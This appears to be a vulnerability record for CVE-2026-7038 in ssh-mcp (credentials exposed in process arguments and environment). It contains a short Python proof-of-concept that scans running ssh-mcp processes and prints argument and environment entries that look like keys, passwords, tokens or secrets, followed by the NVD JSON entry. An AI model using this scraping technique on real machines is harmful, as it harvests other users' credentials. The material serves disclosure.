CVE-2026-7038

import psutil import os # Proof of Concept for CVE-2026-7038 # This script demonstrates how credentials might be leaked if ssh-mcp exposes them in process args/env. def check_credential_leak(): print("[+] Scanning for ssh-mcp processes...") for proc in psutil.process_iter(['pid', 'name', 'cmdline', 'environ']): try: # Check if the process is ssh-mcp if 'ssh-mcp' in proc.info['name'].lower(): print(f"[+] Found target process: PID {proc.info['pid']}") # Check Command Line Arguments cmdline = proc.info['cmdline'] if cmdline: print("[+] Inspecting Command Line Arguments...") for arg in cmdline: # Heuristic: look for keys or passwords in args if 'key' in arg.lower() or 'pass' in arg.lower() or 'ssh' in arg.lower(): print(f"[!] Potential sensitive data found in args: {arg}") # Check Environment Variables environ = proc.info['environ'] if environ: print("[+] Inspecting Environment Variables...") for key, value in environ.items(): # Heuristic: look for SSH keys or tokens if 'SSH' in key or 'TOKEN' in key or 'SECRET' in key: print(f"[!] Potential sensitive data found in env: {key}=***{value[-4:]}") except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess): pass if __name__ == "__main__": check_credential_leak()

{"cve": {"id": "CVE-2026-7038", "sourceIdentifier": "[email protected]", "published": "2026-04-26T12:16:23.373", "lastModified": "2026-04-27T18:50:06.087", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in tufantunc ssh-mcp up to 1.5.0. Impacted is an unknown function of the file src/index.ts of the component Command Line Handler. This manipulation causes insufficiently protected credentials. The attack is restricted to local execution. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "https://github.com/tufantunc/ssh-mcp/", "source": "[email protected]"}, {"url": "https://github.com/tufantunc/ssh-mcp/issues/42", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/798525", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359618", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359618/cti", "source": "[email protected]"}]}}